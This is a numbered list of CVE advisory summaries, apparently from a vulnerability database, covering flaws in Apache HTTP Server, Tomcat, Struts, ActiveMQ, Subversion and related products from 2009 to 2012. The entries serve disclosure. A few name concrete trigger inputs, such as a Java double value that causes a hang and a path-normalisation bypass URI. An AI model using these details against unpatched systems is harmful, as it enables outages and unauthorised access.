5231| [CVE-2012-0031] scoreboard.c in the Apache HTTP Server 2.2.21 and earlier might allow local users to cause a denial of service (daemon crash during shutdown) or possibly have unspecified other impact by modifying a certain type field within a scoreboard shared memory segment, leading to an invalid call to the free function.
5232| [CVE-2012-0022] Apache Tomcat 5.5.x before 5.5.35, 6.x before 6.0.34, and 7.x before 7.0.23 uses an inefficient approach for handling parameters, which allows remote attackers to cause a denial of service (CPU consumption) via a request that contains many parameters and parameter values, a different vulnerability than CVE-2011-4858.
5233| [CVE-2012-0021] The log_cookie function in mod_log_config.c in the mod_log_config module in the Apache HTTP Server 2.2.17 through 2.2.21, when a threaded MPM is used, does not properly handle a %{}C format string, which allows remote attackers to cause a denial of service (daemon crash) via a cookie that lacks both a name and a value.
5234| [CVE-2011-5064] DigestAuthenticator.java in the HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 uses Catalina as the hard-coded server secret (aka private key), which makes it easier for remote attackers to bypass cryptographic protection mechanisms by leveraging knowledge of this string, a different vulnerability than CVE-2011-1184.
5235| [CVE-2011-5063] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check realm values, which might allow remote attackers to bypass intended access restrictions by leveraging the availability of a protection space with weaker authentication or authorization requirements, a different vulnerability than CVE-2011-1184.
5236| [CVE-2011-5062] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not check qop values, which might allow remote attackers to bypass intended integrity-protection requirements via a qop=auth value, a different vulnerability than CVE-2011-1184.
5237| [CVE-2011-5057] Apache Struts 2.3.1.1 and earlier provides interfaces that do not properly restrict access to collections such as the session and request collections, which might allow remote attackers to modify run-time data values via a crafted parameter to an application that implements an affected interface, as demonstrated by the SessionAware, RequestAware, ApplicationAware, ServletRequestAware, ServletResponseAware, and ParameterAware interfaces. NOTE: the vendor disputes the significance of this report because of an "easy work-around in existing apps by configuring the interceptor."
5238| [CVE-2011-5034] Apache Geronimo 2.2.1 and earlier computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters. NOTE: this might overlap CVE-2011-4461.
5239| [CVE-2011-4905] Apache ActiveMQ before 5.6.0 allows remote attackers to cause a denial of service (file-descriptor exhaustion and broker crash or hang) by sending many openwire failover:tcp:// connection requests.
5240| [CVE-2011-4858] Apache Tomcat before 5.5.35, 6.x before 6.0.35, and 7.x before 7.0.23 computes hash values for form parameters without restricting the ability to trigger hash collisions predictably, which allows remote attackers to cause a denial of service (CPU consumption) by sending many crafted parameters.
5241| [CVE-2011-4668] IBM Tivoli Netcool/Reporter 2.2 before 2.2.0.8 allows remote attackers to execute arbitrary code via vectors related to an unspecified CGI program used with the Apache HTTP Server.
5242| [CVE-2011-4449] actions/files/files.php in WikkaWiki 1.3.1 and 1.3.2, when INTRANET_MODE is enabled, supports file uploads for file extensions that are typically absent from an Apache HTTP Server TypesConfig file, which makes it easier for remote attackers to execute arbitrary PHP code by placing this code in a file whose name has multiple extensions, as demonstrated by a (1) .mm or (2) .vpp file.
5243| [CVE-2011-4415] The ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, does not restrict the size of values of environment variables, which allows local users to cause a denial of service (memory consumption or NULL pointer dereference) via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, related to (1) the "len +=" statement and (2) the apr_pcalloc function call, a different vulnerability than CVE-2011-3607.
5244| [CVE-2011-4317] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an @ (at sign) character and a : (colon) character in invalid positions. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
5245| [CVE-2011-3639] The mod_proxy module in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x before 2.2.18, when the Revision 1179239 patch is in place, does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers by using the HTTP/0.9 protocol with a malformed URI containing an initial @ (at sign) character. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-3368.
5246| [CVE-2011-3620] Apache Qpid 0.12 does not properly verify credentials during the joining of a cluster, which allows remote attackers to obtain access to the messaging functionality and job functionality of a cluster by leveraging knowledge of a cluster-username.
5247| [CVE-2011-3607] Integer overflow in the ap_pregsub function in server/util.c in the Apache HTTP Server 2.0.x through 2.0.64 and 2.2.x through 2.2.21, when the mod_setenvif module is enabled, allows local users to gain privileges via a .htaccess file with a crafted SetEnvIf directive, in conjunction with a crafted HTTP request header, leading to a heap-based buffer overflow.
5248| [CVE-2011-3376] org/apache/catalina/core/DefaultInstanceManager.java in Apache Tomcat 7.x before 7.0.22 does not properly restrict ContainerServlets in the Manager application, which allows local users to gain privileges by using an untrusted web application to access the Manager application's functionality.
5249| [CVE-2011-3375] Apache Tomcat 6.0.30 through 6.0.33 and 7.x before 7.0.22 does not properly perform certain caching and recycling operations involving request objects, which allows remote attackers to obtain unintended read access to IP address and HTTP header information in opportunistic circumstances by reading TCP data.
5250| [CVE-2011-3368] The mod_proxy module in the Apache HTTP Server 1.3.x through 1.3.42, 2.0.x through 2.0.64, and 2.2.x through 2.2.21 does not properly interact with use of (1) RewriteRule and (2) ProxyPassMatch pattern matches for configuration of a reverse proxy, which allows remote attackers to send requests to intranet servers via a malformed URI containing an initial @ (at sign) character.
5251| [CVE-2011-3348] The mod_proxy_ajp module in the Apache HTTP Server before 2.2.21, when used with mod_proxy_balancer in certain configurations, allows remote attackers to cause a denial of service (temporary "error state" in the backend server) via a malformed HTTP request.
5252| [CVE-2011-3192] The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
5253| [CVE-2011-3190] Certain AJP protocol connector implementations in Apache Tomcat 7.0.0 through 7.0.20, 6.0.0 through 6.0.33, 5.5.0 through 5.5.33, and possibly other versions allow remote attackers to spoof AJP requests, bypass authentication, and obtain sensitive information by causing the connector to interpret a request body as a new request.
5254| [CVE-2011-2729] native/unix/native/jsvc-unix.c in jsvc in the Daemon component 1.0.3 through 1.0.6 in Apache Commons, as used in Apache Tomcat 5.5.32 through 5.5.33, 6.0.30 through 6.0.32, and 7.0.x before 7.0.20 on Linux, does not drop capabilities, which allows remote attackers to bypass read permissions for files via a request to an application.
5255| [CVE-2011-2712] Cross-site scripting (XSS) vulnerability in Apache Wicket 1.4.x before 1.4.18, when setAutomaticMultiWindowSupport is enabled, allows remote attackers to inject arbitrary web script or HTML via unspecified parameters.
5256| [CVE-2011-2688] SQL injection vulnerability in mysql/mysql-auth.pl in the mod_authnz_external module 3.2.5 and earlier for the Apache HTTP Server allows remote attackers to execute arbitrary SQL commands via the user field.
5257| [CVE-2011-2526] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.19, when sendfile is enabled for the HTTP APR or HTTP NIO connector, does not validate certain request attributes, which allows local users to bypass intended file access restrictions or cause a denial of service (infinite loop or JVM crash) by leveraging an untrusted web application.
5258| [CVE-2011-2516] Off-by-one error in the XML signature feature in Apache XML Security for C++ 1.6.0, as used in Shibboleth before 2.4.3 and possibly other products, allows remote attackers to cause a denial of service (crash) via a signature using a large RSA key, which triggers a buffer overflow.
5259| [CVE-2011-2481] Apache Tomcat 7.0.x before 7.0.17 permits web applications to replace an XML parser used for other web applications, which allows local users to read or modify the (1) web.xml, (2) context.xml, or (3) tld files of arbitrary web applications via a crafted application that is loaded earlier than the target application. NOTE: this vulnerability exists because of a CVE-2009-0783 regression.
5260| [CVE-2011-2329] The rampart_timestamp_token_validate function in util/rampart_timestamp_token.c in Apache Rampart/C 1.3.0 does not properly calculate the expiration of timestamp tokens, which allows remote attackers to bypass intended access restrictions by leveraging an expired token, a different vulnerability than CVE-2011-0730.
5261| [CVE-2011-2204] Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.17, when the MemoryUserDatabase is used, creates log entries containing passwords upon encountering errors in JMX user creation, which allows local users to obtain sensitive information by reading a log file.
5262| [CVE-2011-2088] XWork 2.2.1 in Apache Struts 2.2.1, and OpenSymphony XWork in OpenSymphony WebWork, allows remote attackers to obtain potentially sensitive information about internal Java class paths via vectors involving an s:submit element and a nonexistent method, a different vulnerability than CVE-2011-1772.3.
5263| [CVE-2011-2087] Multiple cross-site scripting (XSS) vulnerabilities in component handlers in the javatemplates (aka Java Templates) plugin in Apache Struts 2.x before 2.2.3 allow remote attackers to inject arbitrary web script or HTML via an arbitrary parameter value to a .action URI, related to improper handling of value attributes in (1) FileHandler.java, (2) HiddenHandler.java, (3) PasswordHandler.java, (4) RadioHandler.java, (5) ResetHandler.java, (6) SelectHandler.java, (7) SubmitHandler.java, and (8) TextFieldHandler.java.
5264| [CVE-2011-1928] The fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library 1.4.3 and 1.4.4, and the Apache HTTP Server 2.2.18, allows remote attackers to cause a denial of service (infinite loop) via a URI that does not match unspecified types of wildcard patterns, as demonstrated by attacks against mod_autoindex in httpd when a /*/WEB-INF/ configuration pattern is used. NOTE: this issue exists because of an incorrect fix for CVE-2011-0419.
5265| [CVE-2011-1921] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is disabled, does not properly enforce permissions for files that had been publicly readable in the past, which allows remote attackers to obtain sensitive information via a replay REPORT operation.
5266| [CVE-2011-1783] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x and 1.6.x before 1.6.17, when the SVNPathAuthz short_circuit option is enabled, allows remote attackers to cause a denial of service (infinite loop and memory consumption) in opportunistic circumstances by requesting data.
5267| [CVE-2011-1772] Multiple cross-site scripting (XSS) vulnerabilities in XWork in Apache Struts 2.x before 2.2.3, and OpenSymphony XWork in OpenSymphony WebWork, allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) an action name, (2) the action attribute of an s:submit element, or (3) the method attribute of an s:submit element.
5268| [CVE-2011-1752] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.17, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request for a baselined WebDAV resource, as exploited in the wild in May 2011.
5269| [CVE-2011-1610] Multiple SQL injection vulnerabilities in xmldirectorylist.jsp in the embedded Apache HTTP Server component in Cisco Unified Communications Manager (aka CUCM, formerly CallManager) 6.x before 6.1(5)su3, 7.x before 7.1(5)su4, 8.0 before 8.0(3a)su2, and 8.5 before 8.5(1)su1 allow remote attackers to execute arbitrary SQL commands via the (1) f, (2) l, or (3) n parameter, aka Bug ID CSCtj42064.
5270| [CVE-2011-1582] Apache Tomcat 7.0.12 and 7.0.13 processes the first request to a servlet without following security constraints that have been configured through annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088, CVE-2011-1183, and CVE-2011-1419.
5271| [CVE-2011-1571] Unspecified vulnerability in the XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote attackers to execute arbitrary commands via unknown vectors.
5272| [CVE-2011-1570] Cross-site scripting (XSS) vulnerability in Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to inject arbitrary web script or HTML via a message title, a different vulnerability than CVE-2004-2030.
5273| [CVE-2011-1503] The XSL Content portlet in Liferay Portal Community Edition (CE) 5.x and 6.x before 6.0.6 GA, when Apache Tomcat or Oracle GlassFish is used, allows remote authenticated users to read arbitrary (1) XSL and (2) XML files via a file:/// URL.
5274| [CVE-2011-1502] Liferay Portal Community Edition (CE) 6.x before 6.0.6 GA, when Apache Tomcat is used, allows remote authenticated users to read arbitrary files via an entity declaration in conjunction with an entity reference, related to an XML External Entity (aka XXE) issue.
5275| [CVE-2011-1498] Apache HttpClient 4.x before 4.1.1 in Apache HttpComponents, when used with an authenticating proxy server, sends the Proxy-Authorization header to the origin server, which allows remote web servers to obtain sensitive information by logging this header.
5276| [CVE-2011-1475] The HTTP BIO connector in Apache Tomcat 7.0.x before 7.0.12 does not properly handle HTTP pipelining, which allows remote attackers to read responses intended for other clients in opportunistic circumstances by examining the application data in HTTP packets, related to "a mix-up of responses for requests from different users."
5277| [CVE-2011-1419] Apache Tomcat 7.x before 7.0.11, when web.xml has no security constraints, does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application. NOTE: this vulnerability exists because of an incomplete fix for CVE-2011-1088.
5278| [CVE-2011-1318] Memory leak in org.apache.jasper.runtime.JspWriterImpl.response in the JavaServer Pages (JSP) component in IBM WebSphere Application Server (WAS) before 7.0.0.15 allows remote attackers to cause a denial of service (memory consumption) by accessing a JSP page of an application that is repeatedly stopped and restarted.
5279| [CVE-2011-1184] The HTTP Digest Access Authentication implementation in Apache Tomcat 5.5.x before 5.5.34, 6.x before 6.0.33, and 7.x before 7.0.12 does not have the expected countermeasures against replay attacks, which makes it easier for remote attackers to bypass intended access restrictions by sniffing the network for valid requests, related to lack of checking of nonce (aka server nonce) and nc (aka nonce-count or client nonce count) values.
5280| [CVE-2011-1183] Apache Tomcat 7.0.11, when web.xml has no login configuration, does not follow security constraints, which allows remote attackers to bypass intended access restrictions via HTTP requests to a meta-data complete web application. NOTE: this vulnerability exists because of an incorrect fix for CVE-2011-1088 and CVE-2011-1419.
5281| [CVE-2011-1176] The configuration merger in itk.c in the Steinar H. Gunderson mpm-itk Multi-Processing Module 2.2.11-01 and 2.2.11-02 for the Apache HTTP Server does not properly handle certain configuration sections that specify NiceValue but not AssignUserID, which might allow remote attackers to gain privileges by leveraging the root uid and root gid of an mpm-itk process.
5282| [CVE-2011-1088] Apache Tomcat 7.x before 7.0.10 does not follow ServletSecurity annotations, which allows remote attackers to bypass intended access restrictions via HTTP requests to a web application.
5283| [CVE-2011-1077] Multiple cross-site scripting (XSS) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5284| [CVE-2011-1026] Multiple cross-site request forgery (CSRF) vulnerabilities in Apache Archiva 1.0 through 1.2.2, and 1.3.x before 1.3.5, allow remote attackers to hijack the authentication of administrators.
5285| [CVE-2011-0715] The mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.16, allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a request that contains a lock token.
5286| [CVE-2011-0534] Apache Tomcat 7.0.0 through 7.0.6 and 6.0.0 through 6.0.30 does not enforce the maxHttpHeaderSize limit for requests involving the NIO HTTP connector, which allows remote attackers to cause a denial of service (OutOfMemoryError) via a crafted request.
5287| [CVE-2011-0533] Cross-site scripting (XSS) vulnerability in Apache Continuum 1.1 through 1.2.3.1, 1.3.6, and 1.4.0 Beta
5288| [CVE-2011-0419] Stack consumption vulnerability in the fnmatch implementation in apr_fnmatch.c in the Apache Portable Runtime (APR) library before 1.4.3 and the Apache HTTP Server before 2.2.18, and in fnmatch.c in libc in NetBSD 5.1, OpenBSD 4.8, FreeBSD, Apple Mac OS X 10.6, Oracle Solaris 10, and Android, allows context-dependent attackers to cause a denial of service (CPU and memory consumption) via *? sequences in the first argument, as demonstrated by attacks against mod_autoindex in httpd.
5289| [CVE-2011-0013] Multiple cross-site scripting (XSS) vulnerabilities in the HTML Manager Interface in Apache Tomcat 5.5 before 5.5.32, 6.0 before 6.0.30, and 7.0 before 7.0.6 allow remote attackers to inject arbitrary web script or HTML, as demonstrated via the display-name tag.
5290| [CVE-2010-4644] Multiple memory leaks in rev_hunt.c in Apache Subversion before 1.6.15 allow remote authenticated users to cause a denial of service (memory consumption and daemon crash) via the -g option to the blame command.
5291| [CVE-2010-4539] The walk function in repos.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion before 1.6.15, allows remote authenticated users to cause a denial of service (NULL pointer dereference and daemon crash) via vectors that trigger the walking of SVNParentPath collections.
5292| [CVE-2010-4476] The Double.parseDouble method in Java Runtime Environment (JRE) in Oracle Java SE and Java for Business 6 Update 23 and earlier, 5.0 Update 27 and earlier, and 1.4.2_29 and earlier, as used in OpenJDK, Apache, JBossweb, and other products, allows remote attackers to cause a denial of service via a crafted string that triggers an infinite loop of estimations during conversion to a double-precision binary floating-point number, as demonstrated using 2.2250738585072012e-308.
5293| [CVE-2010-4455] Unspecified vulnerability in the Oracle HTTP Server component in Oracle Fusion Middleware 11.1.1.2 and 11.1.1.3 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Apache Plugin.
5294| [CVE-2010-4408] Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1 does not require entry of the administrator's password at the time of modifying a user account, which makes it easier for context-dependent attackers to gain privileges by leveraging a (1) unattended workstation or (2) cross-site request forgery (CSRF) vulnerability, a related issue to CVE-2010-3449.
5295| [CVE-2010-4312] The default configuration of Apache Tomcat 6.x does not include the HTTPOnly flag in a Set-Cookie header, which makes it easier for remote attackers to hijack a session via script access to a cookie.
5296| [CVE-2010-4172] Multiple cross-site scripting (XSS) vulnerabilities in the Manager application in Apache Tomcat 6.0.12 through 6.0.29 and 7.0.0 through 7.0.4 allow remote attackers to inject arbitrary web script or HTML via the (1) orderBy or (2) sort parameter to sessionsList.jsp, or unspecified input to (3) sessionDetail.jsp or (4) java/org/apache/catalina/manager/JspHelper.java, related to use of untrusted web applications.
5297| [CVE-2010-3872] The fcgid_header_bucket_read function in fcgid_bucket.c in the mod_fcgid module before 2.3.6 for the Apache HTTP Server does not use bytewise pointer arithmetic in certain circumstances, which has unspecified impact and attack vectors related to "untrusted FastCGI applications" and a "stack buffer overwrite."
5298| [CVE-2010-3863] Apache Shiro before 1.1.0, and JSecurity 0.9.x, does not canonicalize URI paths before comparing them to entries in the shiro.ini file, which allows remote attackers to bypass intended access restrictions via a crafted request, as demonstrated by the /./account/index.jsp URI.
5299| [CVE-2010-3854] Multiple cross-site scripting (XSS) vulnerabilities in the web administration interface (aka Futon) in Apache CouchDB 0.8.0 through 1.0.1 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors.
5300| [CVE-2010-3718] Apache Tomcat 7.0.0 through 7.0.3, 6.0.x, and 5.5.x, when running within a SecurityManager, does not make the ServletContext attribute read-only, which allows local web applications to read or write files outside of the intended working directory, as demonstrated using a directory traversal attack.
5301| [CVE-2010-3449] Cross-site request forgery (CSRF) vulnerability in Redback before 1.2.4, as used in Apache Archiva 1.0 through 1.0.3, 1.1 through 1.1.4, 1.2 through 1.2.2, and 1.3 through 1.3.1
5302| [CVE-2010-3315] authz.c in the mod_dav_svn module for the Apache HTTP Server, as distributed in Apache Subversion 1.5.x before 1.5.8 and 1.6.x before 1.6.13, when SVNPathAuthz short_circuit is enabled, does not properly handle a named repository as a rule scope, which allows remote authenticated users to bypass intended access restrictions via svn commands.
5303| [CVE-2010-3083] sys/ssl/SslSocket.cpp in qpidd in Apache Qpid, as used in Red Hat Enterprise MRG before 1.2.2 and other products, when SSL is enabled, allows remote attackers to cause a denial of service (daemon outage) by connecting to the SSL port but not participating in an SSL handshake.
5304| [CVE-2010-2952] Apache Traffic Server before 2.0.1, and 2.1.x before 2.1.2-unstable, does not properly choose DNS source ports and transaction IDs, and does not properly use DNS query fields to validate responses, which makes it easier for man-in-the-middle attackers to poison the internal DNS cache via a crafted response.
5305| [CVE-2010-2791] mod_proxy in httpd in Apache HTTP Server 2.2.9, when running on Unix, does not close the backend connection if a timeout occurs when reading a response from a persistent connection, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request. NOTE: this is the same issue as CVE-2010-2068, but for a different OS and set of affected versions.
5306| [CVE-2010-2375] Package/Privilege: Plugins for Apache, Sun and IIS web servers Unspecified vulnerability in the WebLogic Server component in Oracle Fusion Middleware 7.0 SP7, 8.1 SP6, 9.0, 9.1, 9.2 MP3, 10.0 MP2, 10.3.2, and 10.3.3 allows remote attackers to affect confidentiality and integrity, related to IIS.
5307| [CVE-2010-2234] Cross-site request forgery (CSRF) vulnerability in Apache CouchDB 0.8.0 through 0.11.0 allows remote attackers to hijack the authentication of administrators for direct requests to an installation URL.
5308| [CVE-2010-2227] Apache Tomcat 5.5.0 through 5.5.29, 6.0.0 through 6.0.27, and 7.0.0 beta does not properly handle an invalid Transfer-Encoding header, which allows remote attackers to cause a denial of service (application outage) or obtain sensitive information via a crafted header that interferes with "recycling of a buffer."
5309| [CVE-2010-2103] Cross-site scripting (XSS) vulnerability in axis2-admin/axis2-admin/engagingglobally in the administration console in Apache Axis2/Java 1.4.1, 1.5.1, and possibly other versions, as used in SAP Business Objects 12, 3com IMC, and possibly other products, allows remote attackers to inject arbitrary web script or HTML via the modules parameter. NOTE: some of these details are obtained from third party information.
5310| [CVE-2010-2086] Apache MyFaces 1.1.7 and 1.2.8, as used in IBM WebSphere Application Server and other applications, does not properly handle an unencrypted view state, which allows remote attackers to conduct cross-site scripting (XSS) attacks or execute arbitrary Expression Language (EL) statements via vectors that involve modifying the serialized view object.
5311| [CVE-2010-2076] Apache CXF 2.0.x before 2.0.13, 2.1.x before 2.1.10, and 2.2.x before 2.2.9, as used in Apache ServiceMix, Apache Camel, Apache Chemistry, Apache jUDDI, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to samples/wsdl_first_pure_xml, a similar issue to CVE-2010-1632.
5312| [CVE-2010-2068] mod_proxy_http.c in mod_proxy_http in the Apache HTTP Server 2.2.9 through 2.2.15, 2.3.4-alpha, and 2.3.5-alpha on Windows, NetWare, and OS/2, in certain configurations involving proxy worker pools, does not properly detect timeouts, which allows remote attackers to obtain a potentially sensitive response intended for a different client in opportunistic circumstances via a normal HTTP request.
5313| [CVE-2010-2057] shared/util/StateUtils.java in Apache MyFaces 1.1.x before 1.1.8, 1.2.x before 1.2.9, and 2.0.x before 2.0.1 uses an encrypted View State without a Message Authentication Code (MAC), which makes it easier for remote attackers to perform successful modifications of the View State via a padding oracle attack.
5314| [CVE-2010-1632] Apache Axis2 before 1.5.2, as used in IBM WebSphere Application Server (WAS) 7.0 through 7.0.0.12, IBM Feature Pack for Web Services 6.1.0.9 through 6.1.0.32, IBM Feature Pack for Web 2.0 1.0.1.0, Apache Synapse, Apache ODE, Apache Tuscany, Apache Geronimo, and other products, does not properly reject DTDs in SOAP messages, which allows remote attackers to read arbitrary files, send HTTP requests to intranet servers, or cause a denial of service (CPU and memory consumption) via a crafted DTD, as demonstrated by an entity declaration in a request to the Synapse SimpleStockQuoteService.
5315| [CVE-2010-1623] Memory leak in the apr_brigade_split_line function in buckets/apr_brigade.c in the Apache Portable Runtime Utility library (aka APR-util) before 1.3.10, as used in the mod_reqtimeout module in the Apache HTTP Server and other software, allows remote attackers to cause a denial of service (memory consumption) via unspecified vectors related to the destruction of an APR bucket.
5316| [CVE-2010-1587] The Jetty ResourceHandler in Apache ActiveMQ 5.x before 5.3.2 and 5.4.x before 5.4.0 allows remote attackers to read JSP source code via a // (slash slash) initial substring in a URI for (1) admin/index.jsp, (2) admin/queues.jsp, or (3) admin/topics.jsp.
5317| [CVE-2010-1452] The (1) mod_cache and (2) mod_dav modules in the Apache HTTP Server 2.2.x before 2.2.16 allow remote attackers to cause a denial of service (process crash) via a request that lacks a path.
5318| [CVE-2010-1325] Cross-site request forgery (CSRF) vulnerability in the apache2-slms package in SUSE Lifecycle Management Server (SLMS) 1.0 on SUSE Linux Enterprise (SLE) 11 allows remote attackers to hijack the authentication of unspecified victims via vectors related to improper parameter quoting. NOTE: some sources report that this is a vulnerability in a product named "Apache SLMS," but that is incorrect.
5319| [CVE-2010-1244] Cross-site request forgery (CSRF) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote attackers to hijack the authentication of unspecified victims for requests that create queues via the JMSDestination parameter in a queue action.
5320| [CVE-2010-1157] Apache Tomcat 5.5.0 through 5.5.29 and 6.0.0 through 6.0.26 might allow remote attackers to discover the server's hostname or IP address by sending a request for a resource that requires (1) BASIC or (2) DIGEST authentication, and then reading the realm field in the WWW-Authenticate header in the reply.
5321| [CVE-2010-1151] Race condition in the mod_auth_shadow module for the Apache HTTP Server allows remote attackers to bypass authentication, and read and possibly modify data, via vectors related to improper interaction with an external helper application for validation of credentials.
5322| [CVE-2010-0684] Cross-site scripting (XSS) vulnerability in createDestination.action in Apache ActiveMQ before 5.3.1 allows remote authenticated users to inject arbitrary web script or HTML via the JMSDestination parameter in a queue action.
5323| [CVE-2010-0434] The ap_read_request function in server/protocol.c in the Apache HTTP Server 2.2.x before 2.2.15, when a multithreaded MPM is used, does not properly handle headers in subrequests in certain circumstances involving a parent request that has a body, which might allow remote attackers to obtain sensitive information via a crafted request that triggers access to memory locations associated with an earlier request.
5324| [CVE-2010-0432] Multiple cross-site scripting (XSS) vulnerabilities in the Apache Open For Business Project (aka OFBiz) 09.04 and earlier, as used in Opentaps, Neogia, and Entente Oya, allow remote attackers to inject arbitrary web script or HTML via (1) the productStoreId parameter to control/exportProductListing, (2) the partyId parameter to partymgr/control/viewprofile (aka partymgr/control/login), (3) the start parameter to myportal/control/showPortalPage, (4) an invalid URI beginning with /facility/control/ReceiveReturn (aka /crmsfa/control/ReceiveReturn or /cms/control/ReceiveReturn), (5) the contentId parameter (aka the entityName variable) to ecommerce/control/ViewBlogArticle, (6) the entityName parameter to webtools/control/FindGeneric, or the (7) subject or (8) content parameter to an unspecified component under ecommerce/control/contactus.
5325| [CVE-2010-0425] modules/arch/win32/mod_isapi.c in mod_isapi in the Apache HTTP Server 2.0.37 through 2.0.63, 2.2.0 through 2.2.14, and 2.3.x before 2.3.7, when running on Windows, does not ensure that request processing is complete before calling isapi_unload for an ISAPI .dll module, which allows remote attackers to execute arbitrary code via unspecified vectors related to a crafted request, a reset packet, and "orphaned callback pointers."
5326| [CVE-2010-0408] The ap_proxy_ajp_request function in mod_proxy_ajp.c in mod_proxy_ajp in the Apache HTTP Server 2.2.x before 2.2.15 does not properly handle certain situations in which a client sends no request body, which allows remote attackers to cause a denial of service (backend server outage) via a crafted request, related to use of a 500 error code instead of the appropriate 400 error code.
5327| [CVE-2010-0390] Unrestricted file upload vulnerability in maxImageUpload/index.php in PHP F1 Max's Image Uploader 1.0, when Apache is not configured to handle the mime-type for files with pjpeg or jpeg extensions, allows remote attackers to execute arbitrary code by uploading a file with a pjpeg or jpeg extension, then accessing it via a direct request to the file in original/. NOTE: some of these details are obtained from third party information.
5328| [CVE-2010-0219] Apache Axis2, as used in dswsbobje.war in SAP BusinessObjects Enterprise XI 3.2, CA ARCserve D2D r15, and other products, has a default password of axis2 for the admin account, which makes it easier for remote attackers to execute arbitrary code by uploading a crafted web service.
5329| [CVE-2010-0010] Integer overflow in the ap_proxy_send_fb function in proxy/proxy_util.c in mod_proxy in the Apache HTTP Server before 1.3.42 on 64-bit platforms allows remote origin servers to cause a denial of service (daemon crash) or possibly execute arbitrary code via a large chunk size that triggers a heap-based buffer overflow.
5330| [CVE-2010-0009] Apache CouchDB 0.8.0 through 0.10.1 allows remote attackers to obtain sensitive information by measuring the completion time of operations that verify (1) hashes or (2) passwords.
5331| [CVE-2009-5120] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 allows connections to TCP port 1812 from arbitrary source IP addresses, which makes it easier for remote attackers to conduct cross-site scripting (XSS) attacks via UTF-7 text to the 404 error page of a Project Woodstock service on this port.
5332| [CVE-2009-5119] The default configuration of Apache Tomcat in Websense Manager in Websense Web Security 7.0 and Web Filter 7.0 enables weak SSL ciphers in conf/server.xml, which makes it easier for remote attackers to obtain sensitive information by sniffing the network and then conducting a brute-force attack against encrypted session data.
5333| [CVE-2009-5006] The SessionAdapter::ExchangeHandlerImpl::checkAlternate function in broker/SessionAdapter.cpp in the C++ Broker component in Apache Qpid before 0.6, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote authenticated users to cause a denial of service (NULL pointer dereference, daemon crash, and cluster outage) by attempting to modify the alternate of an exchange.
5334| [CVE-2009-5005] The Cluster::deliveredEvent function in cluster/Cluster.cpp in Apache Qpid, as used in Red Hat Enterprise MRG before 1.3 and other products, allows remote attackers to cause a denial of service (daemon crash and cluster outage) via invalid AMQP data.
5335| [CVE-2009-4355] Memory leak in the zlib_stateful_finish function in crypto/comp/c_zlib.c in OpenSSL 0.9.8l and earlier and 1.0.0 Beta through Beta 4 allows remote attackers to cause a denial of service (memory consumption) via vectors that trigger incorrect calls to the CRYPTO_cleanup_all_ex_data function, as demonstrated by use of SSLv3 and PHP with the Apache HTTP Server, a related issue to CVE-2008-1678.
5336| [CVE-2009-4269] The password hash generation algorithm in the BUILTIN authentication functionality for Apache Derby before 10.6.1.0 performs a transformation that reduces the size of the set of inputs to SHA-1, which produces a small search space that makes it easier for local and possibly remote attackers to crack passwords by generating hash collisions, related to password substitution.
